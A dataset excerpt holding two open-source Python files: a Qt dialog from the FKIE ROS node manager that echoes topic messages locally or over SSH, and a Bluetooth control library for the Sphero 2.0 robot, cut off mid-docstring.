source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
echo_dialog.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function, unicode_literals
import os
import itertools
import math
import sys
import threading
import time
from datetime import datetime
from python_qt_binding import loadUi
from python_qt_binding.QtCore import Qt, QUrl, QTimer, Signal
from python_qt_binding.QtGui import QIcon, QTextDocument
try:
from python_qt_binding.QtGui import QApplication, QDialog
except Exception:
from python_qt_binding.QtWidgets import QApplication, QDialog
from roslib import message
from genpy.rostime import Time, TVal
import rospy
from . import gui_resources
import fkie_node_manager as nm
from fkie_node_manager_daemon.common import utf8
def isstring(s):
"""Small helper version to check an object is a string in a way that works
for both Python 2 and 3
"""
try:
return isinstance(s, basestring)
except NameError:
return isinstance(s, str)
def _convert_getattr(val, f, t):
"""
Convert atttribute types on the fly, if necessary. This is mainly
to convert uint8[] fields back to an array type.
"""
attr = getattr(val, f)
if isstring(attr) and 'uint8[' in t:
return [ord(x) for x in attr]
else:
return attr
class EchoDialog(QDialog):
MESSAGE_CHARS_LIMIT = 1000
MESSAGE_LINE_LIMIT = 80
MESSAGE_HZ_LIMIT = 10
MAX_DISPLAY_MSGS = 25
STATISTIC_QUEUE_LEN = 1000
SHOW_BYTES = True
SHOW_JITTER = True
SHOW_STD_DEV = False
SHOW_WINDOW_SIZE = False
'''
This dialog shows the output of a topic.
'''
finished_signal = Signal(str)
'''
finished_signal has as parameter the name of the topic and is emitted, if this
dialog was closed.
'''
msg_signal = Signal(object, bool)
'''
msg_signal is a signal, which is emitted, if a new message was received.
'''
text_hz_signal = Signal(str)
text_signal = Signal(str)
'''
text_signal is a signal, which is emitted, if a new text to display was received.
'''
text_error_signal = Signal(str)
'''
text_error_signal is a signal, which is emitted, if a new error text to display was received.
'''
request_pw = Signal(object)
def __init__(self, topic, msg_type, show_only_rate=False, masteruri=None, use_ssh=False, parent=None):
'''
Creates an input dialog.
@param topic: the name of the topic
@type topic: C{str}
@param msg_type: the type of the topic
@type msg_type: C{str}
@raise Exception: if no topic class was found for the given type
'''
QDialog.__init__(self, parent=parent)
self._masteruri = masteruri
masteruri_str = '' if masteruri is None else '[%s]' % masteruri
echo_dialog_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'EchoDialog.ui')
loadUi(echo_dialog_file, self)
self.setObjectName(' - '.join(['EchoDialog', topic, masteruri_str]))
self.setAttribute(Qt.WA_DeleteOnClose, True)
self.setWindowFlags(Qt.Window)
self.setWindowTitle('%s %s %s' % ('Echo --- ' if not show_only_rate else 'Hz --- ', topic, masteruri_str))
self.resize(900, 512)
self.topic = topic
self.show_only_rate = show_only_rate
self.lock = threading.RLock()
self.last_printed_count = 0
self.msg_t0 = -1.
self.msg_tn = 0
self.times = []
self.bytes = []
self.message_count = 0
self._state_message = ''
self._state_size_message = ''
self._scrapped_msgs = 0
self._scrapped_msgs_sl = 0
self._last_received_ts = 0
self.chars_limit = self.MESSAGE_CHARS_LIMIT
self.receiving_hz = self.MESSAGE_HZ_LIMIT
self.line_limit = self.MESSAGE_LINE_LIMIT
self.max_displayed_msgs = self.MAX_DISPLAY_MSGS
self.digits_after_in_array = 2
self.enabled_message_filter = True
self.field_filter_fn = None
self._latched = False
self._msgs = []
self.filterFrame.setVisible(False)
self.topicControlButton.clicked.connect(self.on_topic_control_btn_clicked)
self.clearButton.clicked.connect(self.on_clear_btn_clicked)
if show_only_rate:
self.filterButton.setVisible(False)
else:
self.filterButton.clicked.connect(self.on_filter_clicked)
self.showStringsCheckBox.toggled.connect(self.on_no_str_checkbox_toggled)
self.maxLenStringComboBox.activated[str].connect(self.combobox_reduce_ch_activated)
self.showArraysCheckBox.toggled.connect(self.on_no_arr_checkbox_toggled)
self.maxDigitsComboBox.activated[str].connect(self.combobox_reduce_digits_activated)
self.enableMsgFilterCheckBox.toggled.connect(self.on_enable_msg_filter_checkbox_toggled)
self.maxLenComboBox.activated[str].connect(self.on_combobox_chars_activated)
self.maxHzComboBox.activated[str].connect(self.on_combobox_hz_activated)
self.displayCountComboBox.activated[str].connect(self.on_combobox_count_activated)
self.combobox_reduce_ch_activated(self.MESSAGE_LINE_LIMIT)
self.on_combobox_chars_activated(self.MESSAGE_CHARS_LIMIT)
self.on_combobox_hz_activated(self.MESSAGE_HZ_LIMIT)
self.on_combobox_count_activated(self.MAX_DISPLAY_MSGS)
self.filterButton.setFocus()
self.display.setReadOnly(True)
self.display.document().setMaximumBlockCount(500)
self._blocks_in_msg = None
self.display.setOpenLinks(False)
self.display.anchorClicked.connect(self._on_display_anchorClicked)
# subscribe to the topic
errmsg = ''
try:
self.__msg_class = message.get_message_class(msg_type)
if not self.__msg_class:
errmsg = "Cannot load message class for [%s]. Did you build messages?" % msg_type
except Exception as e:
self.__msg_class = None
errmsg = "Cannot load message class for [%s]. Did you build messagest?\nError: %s" % (msg_type, utf8(e))
# variables for Subscriber
self.msg_signal.connect(self._append_message)
self.sub = None
# vairables for SSH connection
self.ssh_output_file = None
self.ssh_error_file = None
self.ssh_input_file = None
self.text_signal.connect(self._append_text)
self.text_hz_signal.connect(self._append_text_hz)
self._current_msg = ''
self._current_errmsg = ''
self.text_error_signal.connect(self._append_error_text)
# decide, which connection to open
if use_ssh:
self.__msg_class = None
self._on_display_anchorClicked(QUrl(self._masteruri))
elif self.__msg_class is None:
errtxt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">\n%s</pre>' % (errmsg)
self.display.setText('<a href="%s">open using SSH</a>' % (masteruri))
self.display.append(errtxt)
else:
self.sub = rospy.Subscriber(self.topic, self.__msg_class, self._msg_handle)
self.print_hz_timer = QTimer()
self.print_hz_timer.timeout.connect(self._on_calc_hz)
self.print_hz_timer.start(1000)
self._start_time = time.time()
# print "======== create", self.objectName()
#
# def __del__(self):
# print "******* destroy", self.objectName()
# def hideEvent(self, event):
# self.close()
def closeEvent(self, event):
self.print_hz_timer.stop()
if self.sub is not None:
self.sub.unregister()
del self.sub
try:
self.ssh_output_file.close()
self.ssh_error_file.close()
# send Ctrl+C to remote process
self.ssh_input_file.write('%s\n' % chr(3))
self.ssh_input_file.close()
except Exception:
pass
self.finished_signal.emit(self.topic)
if self.parent() is None:
QApplication.quit()
def create_field_filter(self, echo_nostr, echo_noarr):
def field_filter(val):
try:
# fields = val.__slots__
# field_types = val._slot_types
for f, t in zip(val.__slots__, val._slot_types):
if echo_noarr and '[' in t:
continue
elif echo_nostr and 'string' in t:
continue
yield f
except Exception:
pass
return field_filter
def on_filter_clicked(self, checked):
self.filterFrame.setVisible(checked)
def on_no_str_checkbox_toggled(self, state):
self.maxLenStringComboBox.setEnabled(state)
self.field_filter_fn = self.create_field_filter(not state, not self.showArraysCheckBox.isChecked())
def on_no_arr_checkbox_toggled(self, state):
self.maxDigitsComboBox.setEnabled(state)
self.field_filter_fn = self.create_field_filter(not self.showStringsCheckBox.isChecked(), not state)
def combobox_reduce_ch_activated(self, ch_txt):
try:
self.line_limit = int(ch_txt)
except ValueError:
try:
self.line_limit = float(ch_txt)
except ValueError:
self.maxLenStringComboBox.setEditText(str(self.line_limit))
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def combobox_reduce_digits_activated(self, ch_txt):
try:
self.digits_after_in_array = int(ch_txt)
except ValueError:
self.digits_after_in_array = None
self.maxDigitsComboBox.setEditText('')
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_enable_msg_filter_checkbox_toggled(self, state):
self.enabled_message_filter = state
self.maxLenComboBox.setEnabled(state)
self.maxHzComboBox.setEnabled(state)
if self.enabled_message_filter:
self.on_combobox_chars_activated(self.maxLenComboBox.currentText(), False)
self.on_combobox_hz_activated(self.maxHzComboBox.currentText(), False)
else:
self.chars_limit = 0
self.receiving_hz = 0
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_combobox_chars_activated(self, chars_txt, update_display=True):
if not self.enabled_message_filter:
return
try:
self.chars_limit = int(chars_txt)
except ValueError:
try:
self.chars_limit = float(chars_txt)
except ValueError:
self.maxLenComboBox.setEditText(str(self.chars_limit))
if update_display:
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_combobox_hz_activated(self, hz_txt, update_display=True):
if not self.enabled_message_filter:
return
try:
self.receiving_hz = int(hz_txt)
except ValueError:
try:
self.receiving_hz = float(hz_txt)
except ValueError:
self.maxHzComboBox.setEditText(str(self.receiving_hz))
if update_display:
self.display.clear()
with self.lock:
for msg, current_time in self._msgs:
self._append_message(msg, self._latched, current_time, False)
def on_combobox_count_activated(self, count_txt):
try:
self.max_displayed_msgs = int(count_txt)
self._blocks_in_msg = None
except ValueError:
self.displayCountComboBox.setEditText(str(self.max_displayed_msgs))
def on_clear_btn_clicked(self):
self.display.clear()
with self.lock:
del self._msgs[:]
self.message_count = 0
self._scrapped_msgs = 0
del self.times[:]
del self.bytes[:]
def on_topic_control_btn_clicked(self):
try:
if self.sub is None and self.ssh_output_file is None:
if self.__msg_class:
self.sub = rospy.Subscriber(self.topic, self.__msg_class, self._msg_handle)
self._start_time = time.time()
else:
self._on_display_anchorClicked(QUrl(self._masteruri))
self.topicControlButton.setIcon(QIcon(':/icons/sekkyumu_stop.png'))
else:
if self.sub is not None:
self.sub.unregister()
self.sub = None
elif self.ssh_output_file is not None:
self.ssh_output_file.close()
self.ssh_error_file.close()
self.ssh_output_file = None
self.topicControlButton.setIcon(QIcon(':/icons/sekkyumu_play.png'))
except Exception as e:
rospy.logwarn('Error while stop/play echo for topic %s: %s' % (self.topic, utf8(e)))
def _msg_handle(self, data):
self.msg_signal.emit(data, (data._connection_header['latching'] != '0'))
def _append_message(self, msg, latched, current_time=None, store=True):
'''
Adds a label to the dialog's layout and shows the given text.
@param msg: the text to add to the dialog
@type msg: message object
'''
if current_time is None:
current_time = time.time()
self._latched = latched
if store:
with self.lock:
self._msgs.append((msg, current_time))
if len(self._msgs) > 25:
self._msgs.pop()
msg_len = -1
if (self.SHOW_BYTES or self.show_only_rate):
buff = None
try:
from cStringIO import StringIO # Python 2.x
buff = StringIO()
import os
msg.serialize(buff)
buff.seek(0, os.SEEK_END)
msg_len = buff.tell()
except ImportError:
from io import BytesIO # Python 3.x
buff = BytesIO()
msg.serialize(buff)
msg_len = buff.getbuffer().nbytes
self._count_messages(current_time, msg_len)
# skip messages, if they are received often then MESSAGE_HZ_LIMIT
if self._last_received_ts != 0 and self.receiving_hz != 0:
if current_time - self._last_received_ts < 1.0 / self.receiving_hz:
if (not latched or (latched and current_time - self._start_time > 3.0)):
self._scrapped_msgs += 1
self._scrapped_msgs_sl += 1
return
self._last_received_ts = current_time
if not self.show_only_rate:
# convert message to string and reduce line width to current limit
msg = self.strify_message(msg, field_filter=self.field_filter_fn, fixed_numeric_width=self.digits_after_in_array)
if isinstance(msg, tuple):
msg = msg[0]
msg = self._trim_width(msg)
msg = msg.replace('<', '<').replace('>', '>')
msg_cated = False
if self.chars_limit != 0 and len(msg) > self.chars_limit:
msg = msg[0:self.chars_limit]
msg_cated = True
# create a notification about scrapped messages
if self._scrapped_msgs_sl > 0:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">scrapped %s message because of Hz-settings</pre>' % self._scrapped_msgs_sl
self.display.append(txt)
self._scrapped_msgs_sl = 0
txt = '<pre style="background-color:#FFFCCC; color:#000000;font-family:Fixedsys,Courier; padding:10px;">---------- %s --------------------\n%s</pre>' % (datetime.now().strftime("%d.%m.%Y %H:%M:%S.%f"), msg)
# set the count of the displayed messages on receiving the first message
self._update_max_msg_count(txt)
self.display.append(txt)
if msg_cated:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">message has been cut off</pre>'
self.display.append(txt)
if store:
self._print_status()
def _count_messages(self, ts=time.time(), msg_len=-1):
'''
Counts the received messages. Call this method only on receive message.
'''
current_time = ts
with self.lock:
# time reset
if self.msg_t0 < 0 or self.msg_t0 > current_time:
self.msg_t0 = current_time
self.msg_tn = current_time
self.times = []
self.bytes = []
else:
self.times.append(current_time - self.msg_tn)
if msg_len > -1:
self.bytes.append(msg_len)
self.msg_tn = current_time
# keep only statistics for the last 5000 messages so as not to run out of memory
if len(self.times) > self.STATISTIC_QUEUE_LEN:
self.times.pop(0)
if len(self.bytes) > self.STATISTIC_QUEUE_LEN:
self.bytes.pop(0)
self.message_count += 1
def _trim_width(self, msg):
'''
reduce line width to current limit
:param msg: the message
:type msg: str
:return: trimmed message
'''
result = msg
if self.line_limit != 0:
a = ''
for l in msg.splitlines():
a = a + (l if len(l) <= self.line_limit else l[0:self.line_limit - 3] + '...') + '\n'
result = a
return result
def _update_max_msg_count(self, txt):
'''
set the count of the displayed messages on receiving the first message
:param txt: text of the message, which will be added to the document
:type txt: str
'''
if self._blocks_in_msg is None:
td = QTextDocument(txt)
self._blocks_in_msg = td.blockCount()
self.display.document().setMaximumBlockCount(self._blocks_in_msg * self.max_displayed_msgs)
def _on_calc_hz(self):
if rospy.is_shutdown():
self.close()
return
if not self.show_only_rate and time.time() - self._last_received_ts > 1:
# create a notification about scrapped messages
if self._scrapped_msgs_sl > 0:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">scrapped %s message because of Hz-settings</pre>' % self._scrapped_msgs_sl
self._scrapped_msgs_sl = 0
self.display.append(txt)
if self.message_count == self.last_printed_count:
return
with self.lock:
message_rate = ''
message_bytes = ''
message_jitter = ''
message_window = ''
message_std_dev = ''
message_scrapped = ''
sum_times = sum(self.times)
if sum_times == 0:
sum_times = 1
if (self.SHOW_BYTES or self.show_only_rate) and self.bytes:
sum_bytes = sum(self.bytes)
avg = sum_bytes / len(self.bytes)
last = self.bytes[-1]
if avg != last:
message_bytes = "size[ last: %s, avg: %s ]" % (self._normilize_size_print(last), self._normilize_size_print(avg))
else:
message_bytes = "size: %s" % (self._normilize_size_print(last))
byte_rate = float(sum_bytes) / float(sum_times)
message_bytes += " bw: %s/s" % (self._normilize_size_print(byte_rate))
# the code from ROS rostopic
n = len(self.times)
if n < 2:
return
mean = sum_times / n
rate = 1. / mean if mean > 0. else 0
message_rate = "average rate: %.3f" % rate
# min and max
if self.SHOW_JITTER or self.show_only_rate:
max_delta = max(self.times)
min_delta = min(self.times)
message_jitter = "jitter[ min: %.3fs max: %.3fs ]" % (min_delta, max_delta)
# std dev
self.last_printed_count = self.message_count
if self.SHOW_STD_DEV or self.show_only_rate:
std_dev = math.sqrt(sum((x - mean) ** 2 for x in self.times) / n)
message_std_dev = "std dev: %.5fs" % (std_dev)
if self.SHOW_WINDOW_SIZE or self.show_only_rate:
message_window = "window: %s" % (n + 1)
if self._scrapped_msgs > 0:
message_scrapped += "scrapped msgs: %s" % self._scrapped_msgs
self._state_message = ''
self._state_size_message = message_bytes
for msg in [message_rate, message_jitter, message_std_dev, message_window, message_scrapped]:
if msg:
if self._state_message:
self._state_message += ' '
self._state_message += msg
self._print_status()
if self.show_only_rate:
self.display.append("%s %s" % (self._state_message, message_bytes))
def _normilize_size_print(self, size):
if size > 999999:
return "%.2fMiB" % (size / 1048576.0)
if size > 999:
return "%.2fKiB" % (size / 1024.0)
return "%dB" % size
def _print_status(self):
text = '%s messages %s' % (self.message_count, self._state_message)
if self._latched:
text = "[latched] %s" % text
self.statusLabel.setText(text)
self.statusSizeLabel.setText(self._state_size_message)
def _append_text(self, text):
'''
Append echo text received through the SSH.
'''
with self.lock:
self._current_msg += text
if self._current_msg.find('---') != -1:
messages = self._current_msg.split('---')
for m in messages[:-1]:
current_time = time.time()
self._count_messages(current_time)
# limit the displayed text width
m = self._trim_width(m)
txt = '<pre style="background-color:#FFFCCC; color:#000000;font-family:Fixedsys,Courier; padding:10px;">---------- %s --------------------\n%s</pre>' % (datetime.now().strftime("%d.%m.%Y %H:%M:%S.%f"), m)
# set the count of the displayed messages on receiving the first message
self._update_max_msg_count(txt)
self.display.append(txt)
self._current_msg = messages[-1]
self._print_status()
def _append_error_text(self, text):
'''
Append error text received through the SSH.
'''
with self.lock:
self._current_errmsg += text
if self._current_errmsg.find('\n') != -1:
messages = self._current_errmsg.split('\n')
for m in messages[:-1]:
txt = '<pre style="color:red; font-family:Fixedsys,Courier,monospace; padding:10px;">%s</pre>' % m
self.display.append(txt)
self._current_errmsg = messages[-1]
def _append_text_hz(self, text):
'''
Append text received through the SSH for hz view.
'''
with self.lock:
self._current_msg += text
if self._current_msg.find('\n') != -1:
messages = self._current_msg.split('\n')
for m in messages[:-1]:
txt = '<div style="font-family:Fixedsys,Courier;">%s</div>' % (m)
self.display.append(txt)
self._current_msg = messages[-1]
def _on_display_anchorClicked(self, url, user=None, pw=None):
try:
ok = False
if self.show_only_rate:
self.ssh_input_file, self.ssh_output_file, self.ssh_error_file, ok = nm.ssh().ssh_exec(url.host(), ['rostopic hz %s' % (self.topic)], user, pw, auto_pw_request=True, get_pty=True)
self.statusLabel.setText('connected to %s over SSH' % url.host())
else:
nostr = '--nostr' if not self.showStringsCheckBox.isChecked() else ''
noarr = '--noarr' if not self.showArraysCheckBox.isChecked() else ''
self.ssh_input_file, self.ssh_output_file, self.ssh_error_file, ok = nm.ssh().ssh_exec(url.host(), ['rostopic echo %s %s %s' % (nostr, noarr, self.topic)], user, pw, auto_pw_request=True, get_pty=True)
if ok:
self.display.clear()
target = self._read_output_hz if self.show_only_rate else self._read_output
thread = threading.Thread(target=target, args=((self.ssh_output_file,)))
thread.setDaemon(True)
thread.start()
thread = threading.Thread(target=self._read_error, args=((self.ssh_error_file,)))
thread.setDaemon(True)
thread.start()
elif self.ssh_output_file:
self.ssh_output_file.close()
self.ssh_error_file.close()
except Exception as e:
self._append_error_text('%s\n' % e)
def _read_output_hz(self, output_file):
try:
while not output_file.closed:
text = output_file.read(1)
if text:
self.text_hz_signal.emit(text)
except Exception:
pass
def _read_output(self, output_file):
while not output_file.closed:
text = output_file.read(1)
if text:
self.text_signal.emit(text)
def _read_error(self, error_file):
try:
while not error_file.closed:
text = error_file.read(1)
if text:
self.text_error_signal.emit(text)
except Exception:
pass
# #############################################################################
# PARTS OF genpy/messages.py
# #############################################################################
@classmethod
def strify_message(cls, val, indent='', time_offset=None, current_time=None, field_filter=None, fixed_numeric_width=None, digits_after_in_array=None):
"""
Convert value to string representation
:param val: to convert to string representation. Most likely a Message. ``Value``
:param indent: indentation. If indent is set, then the return value will have a leading \n, ``str``
:param time_offset: if not None, time fields will be displayed
as deltas from time_offset, ``Time``
:param current_time: currently not used. Only provided for API
compatibility. current_time passes in the current time with
respect to the message, ``Time``
:param field_filter: filter the fields that are strified for Messages, ``fn(Message)->iter(str)``
:returns: string (YAML) representation of message, ``str``
"""
type_ = type(val)
if type_ in (int, long, float) and fixed_numeric_width is not None:
if type_ is float:
return ('%.' + str(fixed_numeric_width) + 'f') % val
else:
return ('%d') % val
elif type_ in (int, long, float, bool):
return utf8(val)
elif isstring(val):
# TODO: need to escape strings correctly
if not val:
return "''"
return val
elif isinstance(val, TVal):
if time_offset is not None and isinstance(val, Time):
val = val - time_offset
if fixed_numeric_width is not None:
format_str = '%d'
sec_str = '\n%ssecs: ' % indent + (format_str % val.secs)
nsec_str = '\n%snsecs: ' % indent + (format_str % val.nsecs)
return sec_str + nsec_str
else:
return '\n%ssecs: %s\n%snsecs: %9d' % (indent, val.secs, indent, val.nsecs)
elif type_ in (list, tuple):
if len(val) == 0:
return "[]"
val0 = val[0]
if type(val0) in (int, float) and digits_after_in_array is not None:
list_str = '[' + ''.join(cls.strify_message(v, indent, time_offset, current_time, field_filter, digits_after_in_array) + ', ' for v in val).rstrip(', ') + ']'
return list_str
elif type(val0) in (int, float, str, bool):
# TODO: escape strings properly
return utf8(list(val))
else:
pref = indent + '- '
indent = indent + ' '
return '\n' + '\n'.join([pref + cls.strify_message(v, indent, time_offset, current_time, field_filter, digits_after_in_array) for v in val])
elif isinstance(val, message.Message):
# allow caller to select which fields of message are strified
if field_filter is not None:
fields = list(field_filter(val))
else:
fields = val.__slots__
p = '%s%%s: %%s' % (indent)
ni = ' ' + indent
python_zip = None
if sys.hexversion > 0x03000000: # Python3
python_zip = zip
else: # Python2
python_zip = itertools.izip
slots = []
for f, t in python_zip(val.__slots__, val._slot_types):
if f in fields:
cval = _convert_getattr(val, f, t)
slot_name = f
if isinstance(cval, (list, tuple)):
slot_name = "%s[%d]" % (f, len(cval))
slots.append(p % (utf8(slot_name), cls.strify_message(cval, ni, time_offset, current_time, field_filter, fixed_numeric_width)))
vals = '\n'.join(slots)
if indent:
return '\n' + vals
else:
return vals
else:
return utf8(val) # punt
|
Sphero.py
|
"""
Tools for controlling a Sphero 2.0. Sphero is the main class, all others define
parameter or return classes.
Most sphero commands return a Response object, that has two data fields.
`response.success` indicates if the operation was successful, and
`response.data` is any returned data, when appropriate.
"""
from __future__ import print_function
from collections import namedtuple
import struct
import time
import threading
from enum import Enum
from spheropy.BluetoothWrapper import BluetoothWrapper
from spheropy.DataStream import DataStreamManager
from spheropy.Exception import SpheroException
from spheropy.Options import PermanentOptions
from spheropy.Util import nothing, outside_range, int_to_bytes, check_sum, eprint
# Python 3 compatibility
py3 = False
import sys
if sys.version_info > (3,):
py3 = True
def buffer(something):
if isinstance(something,str):
return bytes(something,encoding="ascii")
return bytes(something)
_MSRP = { # taken from sphero api docs
0x00: "OK", # succeeded
0x01: "Error", # non-specific error
0x02: "Checksum Error", # chucksum failure
0x03: "Fragmented Command", # FRAG command
0x04: "Unknown Command", # unknown command id
0x05: "Command unsupported",
0x06: "Bad Message Format",
0x07: "Invalid Paramter values",
0x08: "Failed to execute command",
0x09: "Unknown Device Id",
0x0A: "Ram access need, but is busy",
0x0B: "Incorrect Password",
0x31: "Voltage too low for reflash",
0x32: "Illegal page number",
0x33: "Flash Fail: page did not reprogram correctly",
0x34: "Main application corruptted",
0x35: "Msg state machine timed out"
}
_SOP1 = 0xff
_ANSWER = 0xff
_NO_ANSWER = 0xfe
_ACKNOWLEDGMENT = 0xff
_ASYNC = 0xfe
_CORE = 0x00
_CORE_COMMANDS = {
'PING': 0x01,
'GET VERSIONING': 0x02,
'SET NAME': 0x10,
'GET BLUETOOTH INFO': 0x11,
'GET POWER STATE': 0x20,
'SET POWER NOTIFICATION': 0x21,
'SLEEP': 0x22,
'GET VOLTAGE TRIP': 0x23,
'SET VOLTAGE TRIP': 0x24,
'SET INACT TIMEOUT': 0x25,
'L1': 0x40,
'L2': 0x41,
'ASSIGN TIME': 0x50,
'POLL PACKET TIMES': 0x51
}
_SPHERO = 0x02
_SPHERO_COMMANDS = {
'SET HEADING': 0x01,
'SET STABILIZATION': 0x02,
'SET ROTATION RATE': 0x03,
'GET CHASSIS ID': 0x07,
'SET DATA STRM': 0x11,
'SET COLLISION DETECT': 0x12,
'SET COLOR': 0x20,
'SET BACKLIGHT': 0x21,
'GET COLOR': 0x22,
'ROLL': 0x30,
'BOOST': 0x31,
'SET RAW MOTOR': 0x33,
'MOTION TIMEOUT': 0x34,
'SET PERM OPTIONS': 0x35,
'GET PERM OPTIONS': 0x36,
'SET TEMP OPTIONS': 0x37,
'GET TEMP OPTIONS': 0x38,
}
BluetoothInfo = namedtuple("BluetoothInfo", ['name', 'address', 'color'])
Color = namedtuple('Color', ['r', 'g', 'b'])
MotorValue = namedtuple('MotorValue', ['mode', 'power'])
PacketTime = namedtuple('PacketTime', ['offset', 'delay'])
PowerState = namedtuple('PowerState', [
'recVer', 'power_state', 'batt_voltage', 'num_charges', 'time_since_chg'])
Response = namedtuple('Response', ['success', 'data'])
CollisionMsg = namedtuple('CollisionMsg', [
'x', 'y', 'z', 'axis', 'x_magnitude', 'y_magnitude', 'speed', 'timestamp'])
class MotorState(Enum):
"""
An enum to represent possible motor states
"""
off = 0x00
forward = 0x01
reverse = 0x02
brake = 0x03
ignore = 0x04
class Sphero(object):
"""
Class representing a sphero. Can be used in a `with` block or managed explicitly.
All direct sphero commands will return a `Response` object. where `response.success`
indicates if the command ran successfully, and `response.data` will contain the
data of the response or what went wrong. Other returns will be specified
### Usage:
#!python
from spheropy.Sphero import Sphero
# explicit managment
s = Sphero("Sphero-YWY", "68:86:E7:07:59:71")
s.connect()
s.start() # starts receiving data from sphero
s.roll(50, 0)
s.exit()
# context manager
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.roll(50, 0)
"""
# Static Methods
@classmethod
def find_spheros(cls, tries=5):
"""
Returns a dictionary from names to addresses of all available spheros
`tries` indicates the number of scans to perform before returning results.
### Usage:
#!python
from spheropy.Sphero import Sphero
found_spheros = Sphero.find_spheros()
for key, value in found_sphero.iteritems():
print("Name: {}\tAddress: {}".format(key, value))
"""
return BluetoothWrapper.find_free_devices(tries=tries, regex="[Ss]phero")
# Working
def __init__(self, name, address, port=1, response_time_out=1, number_tries=5):
"""
`name` is mostly used in printing error and information messages, usefull when working with
more then one sphero.
`address` is the bluetooth address and `port` is the RFCOMM port to use every sphero I've used
uses port 1 so you unless you have trouble connectng it shouldn't need to change.
`response_time_out` indicates how long to wait in seconds for a response after a message
that expects a response is sent ,it does not include sendng time.
Any command will be sent up to `number_tries` untill it is successful. This only happens
if a response is expected, otherwise it's sent once. A single command
with a response may block for up to `response_time_out` X `number_tries` seconds
"""
super(Sphero, self).__init__()
self.bluetooth = BluetoothWrapper(address, port)
""" access to bluetooth wrapper, avoid using """
self.suppress_exception = False
""" suppress_exceptions when used in `with` block """
self._seq_num = 0
self.number_tries = number_tries
""" number of times to try to send a command to sphero """
self._msg_lock = threading.Lock()
self._msg = bytearray(2048)
self._msg[0] = _SOP1
self._response_lock = threading.Lock()
self._response_event_lookup = {}
self._responses = {}
self._response_time_out = response_time_out
# self._recieve_thread = threading.Thread(target=self._recieve_loop) # should only be available after connect
self._data_stream = None
self._asyn_func = {
0x01: self._power_notification,
0x02: self._forward_L1_diag,
0x03: self._sensor_data,
0x07: self._collision_detect,
# 0x0B: self._self_level_result,
# 0x0C: self._gyro_exceeded
}
self._sensor_callback = nothing
self._power_callback = nothing
self._collision_callback = nothing
def __enter__(self):
""" for use in contex manager """
connected = False
tries = 0
while not connected and tries < self.number_tries:
try:
connected = self.bluetooth.connect(suppress_exceptions=True)
except SpheroException:
pass
tries += 1
if tries >= self.number_tries:
raise SpheroException("Unable to connect to sphero")
self.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
""" for use in context manager """
self.disconnect()
return self.suppress_exception
def _recieve_loop(self):
""" recieves data from sphero and parses it"""
packet = bytearray(2)
while self.bluetooth.is_connected():
# state one
try:
# bytearray needs ord
packet[0] = 0
while packet[0] != _SOP1:
packet[0] = ord(self.bluetooth.receive(1))
# state two
packet[1] = ord(self.bluetooth.receive(1))
packet_type = packet[1]
if packet_type == _ACKNOWLEDGMENT: # Sync Packet
self._handle_acknowledge()
elif packet_type == _ASYNC:
self._handle_async()
else:
eprint("Malformed Packet")
except Exception as error:
continue
#eprint(error)
#return
def _handle_acknowledge(self):
"""
Parses response packets from sphero. Response added to a response dictionary
as a Response tuple where tuple[0] indicates success and tuple[1] is the data,
the thread waiting on the response is alerted to it via an event registered
in the response_event_lookup dictionary, and is responsible for parsing the data.
all access should be done with the response_lock.
"""
msrp = ord(self.bluetooth.receive(1))
seq = ord(self.bluetooth.receive(1))
length = ord(self.bluetooth.receive(1))
if length == 0xff:
pass
# raise Exception("NOt Implemented _MSRP: {0}".format(_msrp))
# TODO cover oxff cases
array = self._read(length, offset=3)
array[0] = msrp
array[1] = seq
array[2] = length
checksum = check_sum(array[0:-1])
if array[-1] != checksum:
eprint("Malfromed Packet, recieved: {0} expected: {1}".format(
array[-1], checksum))
return
else:
event = None
with self._response_lock:
if seq in self._response_event_lookup:
event = self._response_event_lookup[seq]
del self._response_event_lookup[seq]
else:
return
if msrp == 0:
self._responses[seq] = Response(True, array[3: length + 3 - 1])
else:
self._responses[seq] = Response(
False, _MSRP.get(msrp, "UNKNOWN ERROR"))
event.set()
def _handle_async(self):
"""
Handles async (usually sensor) messages form sphero,
It calls the a parser function which will call any regstered
